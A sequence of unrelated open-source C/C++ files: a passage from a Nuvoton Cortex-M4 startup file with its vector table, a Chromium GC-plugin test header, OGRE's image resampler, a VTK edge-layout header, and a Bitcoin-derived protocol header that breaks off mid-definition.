__attribute__ ((weak, alias(#f))) #define WEAK_ALIAS_FUNC(FUN, FUN_ALIAS) \ void FUN(void) __attribute__ ((weak, alias(#FUN_ALIAS))); #endif /* Initialize segments */ #if defined(__CC_ARM) extern uint32_t Image$$ARM_LIB_STACK$$ZI$$Limit; extern void __main(void); #elif defined(__ICCARM__) void __iar_program_start(void); #elif defined(__GNUC__) extern uint32_t __StackTop; extern uint32_t __etext; extern uint32_t __data_start__; extern uint32_t __data_end__; extern uint32_t __bss_start__; extern uint32_t __bss_end__; extern void uvisor_init(void); //#if defined(TOOLCHAIN_GCC_ARM) //extern void _start(void); //#endif extern void software_init_hook(void) __attribute__((weak)); extern void __libc_init_array(void); extern int main(void); #endif /* Default empty handler */ void Default_Handler(void); /* Reset handler */ void Reset_Handler(void); /* Cortex-M4 core handlers */ WEAK_ALIAS_FUNC(NMI_Handler, Default_Handler) WEAK_ALIAS_FUNC(HardFault_Handler, Default_Handler) WEAK_ALIAS_FUNC(MemManage_Handler, Default_Handler) WEAK_ALIAS_FUNC(BusFault_Handler , Default_Handler) WEAK_ALIAS_FUNC(UsageFault_Handler, Default_Handler) WEAK_ALIAS_FUNC(SVC_Handler, Default_Handler) WEAK_ALIAS_FUNC(DebugMon_Handler, Default_Handler) WEAK_ALIAS_FUNC(PendSV_Handler, Default_Handler) WEAK_ALIAS_FUNC(SysTick_Handler, Default_Handler) /* Peripherals handlers */ WEAK_ALIAS_FUNC(BOD_IRQHandler, Default_Handler) // 0: Brown Out detection WEAK_ALIAS_FUNC(IRC_IRQHandler, Default_Handler) // 1: Internal RC WEAK_ALIAS_FUNC(PWRWU_IRQHandler, Default_Handler) // 2: Power down wake up WEAK_ALIAS_FUNC(RAMPE_IRQHandler, Default_Handler) // 3: RAM parity error WEAK_ALIAS_FUNC(CLKFAIL_IRQHandler, Default_Handler) // 4: Clock detection fail // 5: Reserved WEAK_ALIAS_FUNC(RTC_IRQHandler, Default_Handler) // 6: Real Time Clock WEAK_ALIAS_FUNC(TAMPER_IRQHandler, Default_Handler) // 7: Tamper detection WEAK_ALIAS_FUNC(WDT_IRQHandler, Default_Handler) // 8: Watchdog timer WEAK_ALIAS_FUNC(WWDT_IRQHandler, Default_Handler) // 9: Window watchdog timer WEAK_ALIAS_FUNC(EINT0_IRQHandler, Default_Handler) // 10: External Input 0 WEAK_ALIAS_FUNC(EINT1_IRQHandler, Default_Handler) // 11: External Input 1 WEAK_ALIAS_FUNC(EINT2_IRQHandler, Default_Handler) // 12: External Input 2 WEAK_ALIAS_FUNC(EINT3_IRQHandler, Default_Handler) // 13: External Input 3 WEAK_ALIAS_FUNC(EINT4_IRQHandler, Default_Handler) // 14: External Input 4 WEAK_ALIAS_FUNC(EINT5_IRQHandler, Default_Handler) // 15: External Input 5 WEAK_ALIAS_FUNC(GPA_IRQHandler, Default_Handler) // 16: GPIO Port A WEAK_ALIAS_FUNC(GPB_IRQHandler, Default_Handler) // 17: GPIO Port B WEAK_ALIAS_FUNC(GPC_IRQHandler, Default_Handler) // 18: GPIO Port C WEAK_ALIAS_FUNC(GPD_IRQHandler, Default_Handler) // 19: GPIO Port D WEAK_ALIAS_FUNC(GPE_IRQHandler, Default_Handler) // 20: GPIO Port E WEAK_ALIAS_FUNC(GPF_IRQHandler, Default_Handler) // 21: GPIO Port F WEAK_ALIAS_FUNC(SPI0_IRQHandler, Default_Handler) // 22: SPI0 WEAK_ALIAS_FUNC(SPI1_IRQHandler, Default_Handler) // 23: SPI1 WEAK_ALIAS_FUNC(BRAKE0_IRQHandler, Default_Handler) // 24: WEAK_ALIAS_FUNC(PWM0P0_IRQHandler, Default_Handler) // 25: WEAK_ALIAS_FUNC(PWM0P1_IRQHandler, Default_Handler) // 26: WEAK_ALIAS_FUNC(PWM0P2_IRQHandler, Default_Handler) // 27: WEAK_ALIAS_FUNC(BRAKE1_IRQHandler, Default_Handler) // 28: WEAK_ALIAS_FUNC(PWM1P0_IRQHandler, Default_Handler) // 29: WEAK_ALIAS_FUNC(PWM1P1_IRQHandler, Default_Handler) // 30: WEAK_ALIAS_FUNC(PWM1P2_IRQHandler, Default_Handler) // 31: WEAK_ALIAS_FUNC(TMR0_IRQHandler, Default_Handler) // 32: Timer 0 WEAK_ALIAS_FUNC(TMR1_IRQHandler, Default_Handler) // 33: Timer 1 WEAK_ALIAS_FUNC(TMR2_IRQHandler, Default_Handler) // 34: Timer 2 WEAK_ALIAS_FUNC(TMR3_IRQHandler, Default_Handler) // 35: Timer 3 WEAK_ALIAS_FUNC(UART0_IRQHandler, Default_Handler) // 36: UART0 WEAK_ALIAS_FUNC(UART1_IRQHandler, Default_Handler) // 37: UART1 WEAK_ALIAS_FUNC(I2C0_IRQHandler, Default_Handler) // 38: I2C0 WEAK_ALIAS_FUNC(I2C1_IRQHandler, Default_Handler) // 39: I2C1 WEAK_ALIAS_FUNC(PDMA_IRQHandler, Default_Handler) // 40: Peripheral DMA WEAK_ALIAS_FUNC(DAC_IRQHandler, Default_Handler) // 41: DAC WEAK_ALIAS_FUNC(ADC00_IRQHandler, Default_Handler) // 42: ADC0 interrupt source 0 WEAK_ALIAS_FUNC(ADC01_IRQHandler, Default_Handler) // 43: ADC0 interrupt source 1 WEAK_ALIAS_FUNC(ACMP01_IRQHandler, Default_Handler) // 44: ACMP0 and ACMP1 // 45: Reserved WEAK_ALIAS_FUNC(ADC02_IRQHandler, Default_Handler) // 46: ADC0 interrupt source 2 WEAK_ALIAS_FUNC(ADC03_IRQHandler, Default_Handler) // 47: ADC0 interrupt source 3 WEAK_ALIAS_FUNC(UART2_IRQHandler, Default_Handler) // 48: UART2 WEAK_ALIAS_FUNC(UART3_IRQHandler, Default_Handler) // 49: UART3 // 50: Reserved WEAK_ALIAS_FUNC(SPI2_IRQHandler, Default_Handler) // 51: SPI2 // 52: Reserved WEAK_ALIAS_FUNC(USBD_IRQHandler, Default_Handler) // 53: USB device WEAK_ALIAS_FUNC(USBH_IRQHandler, Default_Handler) // 54: USB host WEAK_ALIAS_FUNC(USBOTG_IRQHandler, Default_Handler) // 55: USB OTG WEAK_ALIAS_FUNC(CAN0_IRQHandler, Default_Handler) // 56: CAN0 // 57: Reserved WEAK_ALIAS_FUNC(SC0_IRQHandler, Default_Handler) // 58: // 59: Reserved. // 60: // 61: // 62: WEAK_ALIAS_FUNC(TK_IRQHandler, Default_Handler) // 63: /* Vector table */ #if defined(__CC_ARM) __attribute__ ((section("RESET"))) const uint32_t __vector_handlers[] = { #elif defined(__ICCARM__) extern uint32_t CSTACK$$Limit; const uint32_t __vector_table[] @ ".intvec" = { #elif defined(__GNUC__) __attribute__ ((section(".vector_table"))) const uint32_t __vector_handlers[] = { #endif /* Configure Initial Stack Pointer, using linker-generated symbols */ #if defined(__CC_ARM) (uint32_t) &Image$$ARM_LIB_STACK$$ZI$$Limit, #elif defined(__ICCARM__) //(uint32_t) __sfe("CSTACK"), (uint32_t) &CSTACK$$Limit, #elif defined(__GNUC__) (uint32_t) &__StackTop, #endif (uint32_t) Reset_Handler, // Reset Handler (uint32_t) NMI_Handler, // NMI Handler (uint32_t) HardFault_Handler, // Hard Fault Handler (uint32_t) MemManage_Handler, // MPU Fault Handler (uint32_t) BusFault_Handler, // Bus Fault Handler (uint32_t) UsageFault_Handler, // Usage Fault Handler 0, // Reserved 0, // Reserved 0, // Reserved 0, // Reserved (uint32_t) SVC_Handler, // SVCall Handler (uint32_t) DebugMon_Handler, // Debug Monitor Handler 0, // Reserved (uint32_t) PendSV_Handler, // PendSV Handler (uint32_t) SysTick_Handler, // SysTick Handler /* External Interrupts */ (uint32_t) BOD_IRQHandler, // 0: Brown Out detection (uint32_t) IRC_IRQHandler, // 1: Internal RC (uint32_t) PWRWU_IRQHandler, // 2: Power down wake up (uint32_t) RAMPE_IRQHandler, // 3: RAM parity error (uint32_t) CLKFAIL_IRQHandler, // 4: Clock detection fail (uint32_t) Default_Handler, // 5: Reserved (uint32_t) RTC_IRQHandler, // 6: Real Time Clock (uint32_t) TAMPER_IRQHandler, // 7: Tamper detection (uint32_t) WDT_IRQHandler, // 8: Watchdog timer (uint32_t) WWDT_IRQHandler, // 9: Window watchdog timer (uint32_t) EINT0_IRQHandler, // 10: External Input 0 (uint32_t) EINT1_IRQHandler, // 11: External Input 1 (uint32_t) EINT2_IRQHandler, // 12: External Input 2 (uint32_t) EINT3_IRQHandler, // 13: External Input 3 (uint32_t) EINT4_IRQHandler, // 14: External Input 4 (uint32_t) EINT5_IRQHandler, // 15: External Input 5 (uint32_t) GPA_IRQHandler, // 16: GPIO Port A (uint32_t) GPB_IRQHandler, // 17: GPIO Port B (uint32_t) GPC_IRQHandler, // 18: GPIO Port C (uint32_t) GPD_IRQHandler, // 19: GPIO Port D (uint32_t) GPE_IRQHandler, // 20: GPIO Port E (uint32_t) GPF_IRQHandler, // 21: GPIO Port F (uint32_t) SPI0_IRQHandler, // 22: SPI0 (uint32_t) SPI1_IRQHandler, // 23: SPI1 (uint32_t) BRAKE0_IRQHandler, // 24: (uint32_t) PWM0P0_IRQHandler, // 25: (uint32_t) PWM0P1_IRQHandler, // 26: (uint32_t) PWM0P2_IRQHandler, // 27: (uint32_t) BRAKE1_IRQHandler, // 28: (uint32_t) PWM1P0_IRQHandler, // 29: (uint32_t) PWM1P1_IRQHandler, // 30: (uint32_t) PWM1P2_IRQHandler, // 31: (uint32_t) TMR0_IRQHandler, // 32: Timer 0 (uint32_t) TMR1_IRQHandler, // 33: Timer 1 (uint32_t) TMR2_IRQHandler, // 34: Timer 2 (uint32_t) TMR3_IRQHandler, // 35: Timer 3 (uint32_t) UART0_IRQHandler, // 36: UART0 (uint32_t) UART1_IRQHandler, // 37: UART1 (uint32_t) I2C0_IRQHandler, // 38: I2C0 (uint32_t) I2C1_IRQHandler, // 39: I2C1 (uint32_t) PDMA_IRQHandler, // 40: Peripheral DMA (uint32_t) DAC_IRQHandler, // 41: DAC (uint32_t) ADC00_IRQHandler, // 42: ADC0 interrupt source 0 (uint32_t) ADC01_IRQHandler, // 43: ADC0 interrupt source 1 (uint32_t) ACMP01_IRQHandler, // 44: ACMP0 and ACMP1 (uint32_t) Default_Handler, // 45: Reserved (uint32_t) ADC02_IRQHandler, // 46: ADC0 interrupt source 2 (uint32_t) ADC03_IRQHandler, // 47: ADC0 interrupt source 3 (uint32_t) UART2_IRQHandler, // 48: UART2 (uint32_t) UART3_IRQHandler, // 49: UART3 (uint32_t) Default_Handler, // 50: Reserved (uint32_t) SPI2_IRQHandler, // 51: SPI2 (uint32_t) Default_Handler, // 52: Reserved (uint32_t) USBD_IRQHandler, // 53: USB device (uint32_t) USBH_IRQHandler, // 54: USB host (uint32_t) USBOTG_IRQHandler, // 55: USB OTG (uint32_t) CAN0_IRQHandler, // 56: CAN0 (uint32_t) Default_Handler, // 57: Reserved (uint32_t) SC0_IRQHandler, // 58: (uint32_t) Default_Handler, // 59: Reserved. (uint32_t) Default_Handler, // 60: (uint32_t) Default_Handler, // 61: (uint32_t) Default_Handler, // 62: (uint32_t) TK_IRQHandler, // 63: }; /** * \brief This is the code that gets called on processor reset. */ void Reset_Handler(void) { /* Disable register write-protection function */ SYS_UnlockReg(); /* Disable Power-on Reset function */ SYS_DISABLE_POR(); /* HXT Crystal Type Select: INV */ CLK->PWRCTL &= ~CLK_PWRCTL_HXTSELTYP_Msk; /* Enable register write-protection function */ SYS_LockReg(); /** * Because EBI (external SRAM) init is done in SystemInit(), SystemInit() must be called at the very start. */ SystemInit(); #if defined(__CC_ARM) __main(); #elif defined(__ICCARM__) __iar_program_start(); #elif defined(__GNUC__) uint32_t *src_ind = (uint32_t *) &__etext; uint32_t *dst_ind = (uint32_t *) &__data_start__; uint32_t *dst_end = (uint32_t *) &__data_end__; /* Move .data section from ROM to RAM */ if (src_ind != dst_ind) { for (; dst_ind < dst_end;) { *dst_ind ++ = *src_ind ++; } } /* Initialize .bss section to zero */ dst_ind = (uint32_t *) &__bss_start__; dst_end = (uint32_t *) &__bss_end__; if (dst_ind != dst_end) { for (; dst_ind < dst_end;) { *dst_ind ++ = 0; } } //uvisor_init(); if (software_init_hook) { /** * Give control to the RTOS via software_init_hook() which will also call __libc_init_array(). * Assume software_init_hook() is defined in libraries/rtos/rtx/TARGET_CORTEX_M/RTX_CM_lib.h. */ software_init_hook(); } else { __libc_init_array(); main(); } #endif /* Infinite loop */ while (1); } /** * \brief Default interrupt handler for unused IRQs. */ void Default_Handler(void) { while (1); }
// Copyright 2014 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef REF_PTR_TO_GC_MANAGED_CLASS_H_ #define REF_PTR_TO_GC_MANAGED_CLASS_H_ #include "heap/stubs.h" namespace WebCore { class HeapObject; class PartObject { DISALLOW_ALLOCATION(); private: RefPtr<HeapObject> m_obj; }; class HeapObject : public GarbageCollected<HeapObject> { public: void trace(Visitor*); private: PartObject m_part; Vector<RefPtr<HeapObject> > m_objs; }; } #endif
/* ----------------------------------------------------------------------------- This source file is part of OGRE (Object-oriented Graphics Rendering Engine) For the latest info, see http://www.ogre3d.org/ Copyright (c) 2000-2014 Torus Knot Software Ltd Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ----------------------------------------------------------------------------- */ #ifndef OGREIMAGERESAMPLER_H #define OGREIMAGERESAMPLER_H #include <algorithm> // this file is inlined into OgreImage.cpp! // do not include anywhere else. namespace Ogre { /** \addtogroup Core * @{ */ /** \addtogroup Image * @{ */ // variable name hints: // sx_48 = 16/48-bit fixed-point x-position in source // stepx = difference between adjacent sx_48 values // sx1 = lower-bound integer x-position in source // sx2 = upper-bound integer x-position in source // sxf = fractional weight between sx1 and sx2 // x,y,z = location of output pixel in destination // nearest-neighbor resampler, does not convert formats. // templated on bytes-per-pixel to allow compiler optimizations, such // as simplifying memcpy() and replacing multiplies with bitshifts template<unsigned int elemsize> struct NearestResampler { static void scale(const PixelBox& src, const PixelBox& dst) { // assert(src.format == dst.format); // srcdata stays at beginning, pdst is a moving pointer uchar* srcdata = (uchar*)src.getTopLeftFrontPixelPtr(); uchar* pdst = (uchar*)dst.getTopLeftFrontPixelPtr(); // sx_48,sy_48,sz_48 represent current position in source // using 16/48-bit fixed precision, incremented by steps uint64 stepx = ((uint64)src.getWidth() << 48) / dst.getWidth(); uint64 stepy = ((uint64)src.getHeight() << 48) / dst.getHeight(); uint64 stepz = ((uint64)src.getDepth() << 48) / dst.getDepth(); // note: ((stepz>>1) - 1) is an extra half-step increment to adjust // for the center of the destination pixel, not the top-left corner uint64 sz_48 = (stepz >> 1) - 1; for (size_t z = dst.front; z < dst.back; z++, sz_48 += stepz) { size_t srczoff = (size_t)(sz_48 >> 48) * src.slicePitch; uint64 sy_48 = (stepy >> 1) - 1; for (size_t y = dst.top; y < dst.bottom; y++, sy_48 += stepy) { size_t srcyoff = (size_t)(sy_48 >> 48) * src.rowPitch; uint64 sx_48 = (stepx >> 1) - 1; for (size_t x = dst.left; x < dst.right; x++, sx_48 += stepx) { uchar* psrc = srcdata + elemsize*((size_t)(sx_48 >> 48) + srcyoff + srczoff); memcpy(pdst, psrc, elemsize); pdst += elemsize; } pdst += elemsize*dst.getRowSkip(); } pdst += elemsize*dst.getSliceSkip(); } } }; // default floating-point linear resampler, does format conversion struct LinearResampler { static void scale(const PixelBox& src, const PixelBox& dst) { size_t srcelemsize = PixelUtil::getNumElemBytes(src.format); size_t dstelemsize = PixelUtil::getNumElemBytes(dst.format); // srcdata stays at beginning, pdst is a moving pointer uchar* srcdata = (uchar*)src.getTopLeftFrontPixelPtr(); uchar* pdst = (uchar*)dst.getTopLeftFrontPixelPtr(); // sx_48,sy_48,sz_48 represent current position in source // using 16/48-bit fixed precision, incremented by steps uint64 stepx = ((uint64)src.getWidth() << 48) / dst.getWidth(); uint64 stepy = ((uint64)src.getHeight() << 48) / dst.getHeight(); uint64 stepz = ((uint64)src.getDepth() << 48) / dst.getDepth(); // note: ((stepz>>1) - 1) is an extra half-step increment to adjust // for the center of the destination pixel, not the top-left corner uint64 sz_48 = (stepz >> 1) - 1; for (size_t z = dst.front; z < dst.back; z++, sz_48+=stepz) { // temp is 16/16 bit fixed precision, used to adjust a source // coordinate (x, y, or z) backwards by half a pixel so that the // integer bits represent the first sample (eg, sx1) and the // fractional bits are the blend weight of the second sample unsigned int temp = static_cast<unsigned int>(sz_48 >> 32); temp = (temp > 0x8000)? temp - 0x8000 : 0; uint32 sz1 = temp >> 16; // src z, sample #1 uint32 sz2 = std::min(sz1+1,src.getDepth()-1);// src z, sample #2 float szf = (temp & 0xFFFF) / 65536.f; // weight of sample #2 uint64 sy_48 = (stepy >> 1) - 1; for (size_t y = dst.top; y < dst.bottom; y++, sy_48+=stepy) { temp = static_cast<unsigned int>(sy_48 >> 32); temp = (temp > 0x8000)? temp - 0x8000 : 0; uint32 sy1 = temp >> 16; // src y #1 uint32 sy2 = std::min(sy1+1,src.getHeight()-1);// src y #2 float syf = (temp & 0xFFFF) / 65536.f; // weight of #2 uint64 sx_48 = (stepx >> 1) - 1; for (size_t x = dst.left; x < dst.right; x++, sx_48+=stepx) { temp = static_cast<unsigned int>(sx_48 >> 32); temp = (temp > 0x8000)? temp - 0x8000 : 0; uint32 sx1 = temp >> 16; // src x #1 uint32 sx2 = std::min(sx1+1,src.getWidth()-1);// src x #2 float sxf = (temp & 0xFFFF) / 65536.f; // weight of #2 ColourValue x1y1z1, x2y1z1, x1y2z1, x2y2z1; ColourValue x1y1z2, x2y1z2, x1y2z2, x2y2z2; #define UNPACK(dst,x,y,z) PixelUtil::unpackColour(&dst, src.format, \ srcdata + srcelemsize*((x)+(y)*src.rowPitch+(z)*src.slicePitch)) UNPACK(x1y1z1,sx1,sy1,sz1); UNPACK(x2y1z1,sx2,sy1,sz1); UNPACK(x1y2z1,sx1,sy2,sz1); UNPACK(x2y2z1,sx2,sy2,sz1); UNPACK(x1y1z2,sx1,sy1,sz2); UNPACK(x2y1z2,sx2,sy1,sz2); UNPACK(x1y2z2,sx1,sy2,sz2); UNPACK(x2y2z2,sx2,sy2,sz2); #undef UNPACK ColourValue accum = x1y1z1 * ((1.0f - sxf)*(1.0f - syf)*(1.0f - szf)) + x2y1z1 * ( sxf *(1.0f - syf)*(1.0f - szf)) + x1y2z1 * ((1.0f - sxf)* syf *(1.0f - szf)) + x2y2z1 * ( sxf * syf *(1.0f - szf)) + x1y1z2 * ((1.0f - sxf)*(1.0f - syf)* szf ) + x2y1z2 * ( sxf *(1.0f - syf)* szf ) + x1y2z2 * ((1.0f - sxf)* syf * szf ) + x2y2z2 * ( sxf * syf * szf ); PixelUtil::packColour(accum, dst.format, pdst); pdst += dstelemsize; } pdst += dstelemsize*dst.getRowSkip(); } pdst += dstelemsize*dst.getSliceSkip(); } } }; // float32 linear resampler, converts FLOAT32_RGB/FLOAT32_RGBA only. // avoids overhead of pixel unpack/repack function calls struct LinearResampler_Float32 { static void scale(const PixelBox& src, const PixelBox& dst) { size_t srcchannels = PixelUtil::getNumElemBytes(src.format) / sizeof(float); size_t dstchannels = PixelUtil::getNumElemBytes(dst.format) / sizeof(float); // assert(srcchannels == 3 || srcchannels == 4); // assert(dstchannels == 3 || dstchannels == 4); // srcdata stays at beginning, pdst is a moving pointer float* srcdata = (float*)src.getTopLeftFrontPixelPtr(); float* pdst = (float*)dst.getTopLeftFrontPixelPtr(); // sx_48,sy_48,sz_48 represent current position in source // using 16/48-bit fixed precision, incremented by steps uint64 stepx = ((uint64)src.getWidth() << 48) / dst.getWidth(); uint64 stepy = ((uint64)src.getHeight() << 48) / dst.getHeight(); uint64 stepz = ((uint64)src.getDepth() << 48) / dst.getDepth(); // note: ((stepz>>1) - 1) is an extra half-step increment to adjust // for the center of the destination pixel, not the top-left corner uint64 sz_48 = (stepz >> 1) - 1; for (size_t z = dst.front; z < dst.back; z++, sz_48+=stepz) { // temp is 16/16 bit fixed precision, used to adjust a source // coordinate (x, y, or z) backwards by half a pixel so that the // integer bits represent the first sample (eg, sx1) and the // fractional bits are the blend weight of the second sample unsigned int temp = static_cast<unsigned int>(sz_48 >> 32); temp = (temp > 0x8000)? temp - 0x8000 : 0; uint32 sz1 = temp >> 16; // src z, sample #1 uint32 sz2 = std::min(sz1+1,src.getDepth()-1);// src z, sample #2 float szf = (temp & 0xFFFF) / 65536.f; // weight of sample #2 uint64 sy_48 = (stepy >> 1) - 1; for (size_t y = dst.top; y < dst.bottom; y++, sy_48+=stepy) { temp = static_cast<unsigned int>(sy_48 >> 32); temp = (temp > 0x8000)? temp - 0x8000 : 0; uint32 sy1 = temp >> 16; // src y #1 uint32 sy2 = std::min(sy1+1,src.getHeight()-1);// src y #2 float syf = (temp & 0xFFFF) / 65536.f; // weight of #2 uint64 sx_48 = (stepx >> 1) - 1; for (size_t x = dst.left; x < dst.right; x++, sx_48+=stepx) { temp = static_cast<unsigned int>(sx_48 >> 32); temp = (temp > 0x8000)? temp - 0x8000 : 0; uint32 sx1 = temp >> 16; // src x #1 uint32 sx2 = std::min(sx1+1,src.getWidth()-1);// src x #2 float sxf = (temp & 0xFFFF) / 65536.f; // weight of #2 // process R,G,B,A simultaneously for cache coherence? float accum[4] = { 0.0f, 0.0f, 0.0f, 0.0f }; #define ACCUM3(x,y,z,factor) \ { float f = factor; \ size_t off = (x+y*src.rowPitch+z*src.slicePitch)*srcchannels; \ accum[0]+=srcdata[off+0]*f; accum[1]+=srcdata[off+1]*f; \ accum[2]+=srcdata[off+2]*f; } #define ACCUM4(x,y,z,factor) \ { float f = factor; \ size_t off = (x+y*src.rowPitch+z*src.slicePitch)*srcchannels; \ accum[0]+=srcdata[off+0]*f; accum[1]+=srcdata[off+1]*f; \ accum[2]+=srcdata[off+2]*f; accum[3]+=srcdata[off+3]*f; } if (srcchannels == 3 || dstchannels == 3) { // RGB, no alpha ACCUM3(sx1,sy1,sz1,(1.0f-sxf)*(1.0f-syf)*(1.0f-szf)); ACCUM3(sx2,sy1,sz1, sxf *(1.0f-syf)*(1.0f-szf)); ACCUM3(sx1,sy2,sz1,(1.0f-sxf)* syf *(1.0f-szf)); ACCUM3(sx2,sy2,sz1, sxf * syf *(1.0f-szf)); ACCUM3(sx1,sy1,sz2,(1.0f-sxf)*(1.0f-syf)* szf ); ACCUM3(sx2,sy1,sz2, sxf *(1.0f-syf)* szf ); ACCUM3(sx1,sy2,sz2,(1.0f-sxf)* syf * szf ); ACCUM3(sx2,sy2,sz2, sxf * syf * szf ); accum[3] = 1.0f; } else { // RGBA ACCUM4(sx1,sy1,sz1,(1.0f-sxf)*(1.0f-syf)*(1.0f-szf)); ACCUM4(sx2,sy1,sz1, sxf *(1.0f-syf)*(1.0f-szf)); ACCUM4(sx1,sy2,sz1,(1.0f-sxf)* syf *(1.0f-szf)); ACCUM4(sx2,sy2,sz1, sxf * syf *(1.0f-szf)); ACCUM4(sx1,sy1,sz2,(1.0f-sxf)*(1.0f-syf)* szf ); ACCUM4(sx2,sy1,sz2, sxf *(1.0f-syf)* szf ); ACCUM4(sx1,sy2,sz2,(1.0f-sxf)* syf * szf ); ACCUM4(sx2,sy2,sz2, sxf * syf * szf ); } memcpy(pdst, accum, sizeof(float)*dstchannels); #undef ACCUM3 #undef ACCUM4 pdst += dstchannels; } pdst += dstchannels*dst.getRowSkip(); } pdst += dstchannels*dst.getSliceSkip(); } } }; // byte linear resampler, does not do any format conversions. // only handles pixel formats that use 1 byte per color channel. // 2D only; punts 3D pixelboxes to default LinearResampler (slow). // templated on bytes-per-pixel to allow compiler optimizations, such // as unrolling loops and replacing multiplies with bitshifts template<unsigned int channels> struct LinearResampler_Byte { static void scale(const PixelBox& src, const PixelBox& dst) { // assert(src.format == dst.format); // only optimized for 2D if (src.getDepth() > 1 || dst.getDepth() > 1) { LinearResampler::scale(src, dst); return; } // srcdata stays at beginning of slice, pdst is a moving pointer uchar* srcdata = (uchar*)src.getTopLeftFrontPixelPtr(); uchar* pdst = (uchar*)dst.getTopLeftFrontPixelPtr(); // sx_48,sy_48 represent current position in source // using 16/48-bit fixed precision, incremented by steps uint64 stepx = ((uint64)src.getWidth() << 48) / dst.getWidth(); uint64 stepy = ((uint64)src.getHeight() << 48) / dst.getHeight(); uint64 sy_48 = (stepy >> 1) - 1; for (size_t y = dst.top; y < dst.bottom; y++, sy_48+=stepy) { // bottom 28 bits of temp are 16/12 bit fixed precision, used to // adjust a source coordinate backwards by half a pixel so that the // integer bits represent the first sample (eg, sx1) and the // fractional bits are the blend weight of the second sample unsigned int temp = static_cast<unsigned int>(sy_48 >> 36); temp = (temp > 0x800)? temp - 0x800: 0; unsigned int syf = temp & 0xFFF; uint32 sy1 = temp >> 12; uint32 sy2 = std::min(sy1+1, src.bottom-src.top-1); size_t syoff1 = sy1 * src.rowPitch; size_t syoff2 = sy2 * src.rowPitch; uint64 sx_48 = (stepx >> 1) - 1; for (size_t x = dst.left; x < dst.right; x++, sx_48+=stepx) { temp = static_cast<unsigned int>(sx_48 >> 36); temp = (temp > 0x800)? temp - 0x800 : 0; unsigned int sxf = temp & 0xFFF; uint32 sx1 = temp >> 12; uint32 sx2 = std::min(sx1+1, src.right-src.left-1); unsigned int sxfsyf = sxf*syf; for (unsigned int k = 0; k < channels; k++) { unsigned int accum = srcdata[(sx1 + syoff1)*channels+k]*(0x1000000-(sxf<<12)-(syf<<12)+sxfsyf) + srcdata[(sx2 + syoff1)*channels+k]*((sxf<<12)-sxfsyf) + srcdata[(sx1 + syoff2)*channels+k]*((syf<<12)-sxfsyf) + srcdata[(sx2 + syoff2)*channels+k]*sxfsyf; // accum is computed using 8/24-bit fixed-point math // (maximum is 0xFF000000; rounding will not cause overflow) *pdst++ = static_cast<uchar>((accum + 0x800000) >> 24); } } pdst += channels*dst.getRowSkip(); } } }; /** @} */ /** @} */ } #endif
/*========================================================================= Program: Visualization Toolkit Module: vtkEdgeLayoutStrategy.h Copyright (c) Ken Martin, Will Schroeder, Bill Lorensen All rights reserved. See Copyright.txt or http://www.kitware.com/Copyright.htm for details. This software is distributed WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the above copyright notice for more information. =========================================================================*/ /*---------------------------------------------------------------------------- Copyright (c) Sandia Corporation See Copyright.txt or http://www.paraview.org/HTML/Copyright.html for details. ----------------------------------------------------------------------------*/ /** * @class vtkEdgeLayoutStrategy * @brief abstract superclass for all edge layout strategies * * * All edge layouts should subclass from this class. vtkEdgeLayoutStrategy * works as a plug-in to the vtkEdgeLayout algorithm. */ #ifndef vtkEdgeLayoutStrategy_h #define vtkEdgeLayoutStrategy_h #include "vtkInfovisLayoutModule.h" // For export macro #include "vtkObject.h" class vtkGraph; class VTKINFOVISLAYOUT_EXPORT vtkEdgeLayoutStrategy : public vtkObject { public: vtkTypeMacro(vtkEdgeLayoutStrategy,vtkObject); void PrintSelf(ostream& os, vtkIndent indent) override; /** * Setting the graph for the layout strategy */ virtual void SetGraph(vtkGraph *graph); /** * This method allows the layout strategy to * do initialization of data structures * or whatever else it might want to do. */ virtual void Initialize() {} /** * This is the layout method where the graph that was * set in SetGraph() is laid out. */ virtual void Layout()=0; //@{ /** * Set/Get the field to use for the edge weights. */ vtkSetStringMacro(EdgeWeightArrayName); vtkGetStringMacro(EdgeWeightArrayName); //@} protected: vtkEdgeLayoutStrategy(); ~vtkEdgeLayoutStrategy() override; vtkGraph *Graph; char *EdgeWeightArrayName; private: vtkEdgeLayoutStrategy(const vtkEdgeLayoutStrategy&) = delete; void operator=(const vtkEdgeLayoutStrategy&) = delete; }; #endif
// Copyright (c) 2009-2010 Satoshi Nakamoto // Copyright (c) 2009-2012 The Bitcoin developers // Distributed under the MIT/X11 software license, see the accompanying // file COPYING or http://www.opensource.org/licenses/mit-license.php. #ifndef __cplusplus # error This header can only be compiled as C++. #endif #ifndef __INCLUDED_PROTOCOL_H__ #define __INCLUDED_PROTOCOL_H__ #include "serialize.h" #include "netbase.h" #include <string> #include "uint256.h" extern bool fTestNet; static inline unsigned short GetDefaultPort(const bool testnet = fTestNet) { return testnet ? 17893 : 7893; } extern unsigned char pchMessageStart[4]; /** Message header. * (4) message start. * (12) command. * (4) size. * (4) checksum. */ class CMessageHeader { public: CMessageHeader(); CMessageHeader(const char* pszCommand, unsigned int nMessageSizeIn); std::string GetCommand() const; bool IsValid() const; IMPLEMENT_SERIALIZE ( READWRITE(FLATDATA(pchMessageStart)); READWRITE(FLATDATA(pchCommand)); READWRITE(nMessageSize); READWRITE(nChecksum); ) // TODO: make private (improves encapsulation) public: enum { MESSAGE_START_SIZE=sizeof(::pchMessageStart), COMMAND_SIZE=12, MESSAGE_SIZE_SIZE=sizeof(int), CHECKSUM_SIZE=sizeof(int), MESSAGE_SIZE_OFFSET=MESSAGE_START_SIZE+COMMAND_SIZE, 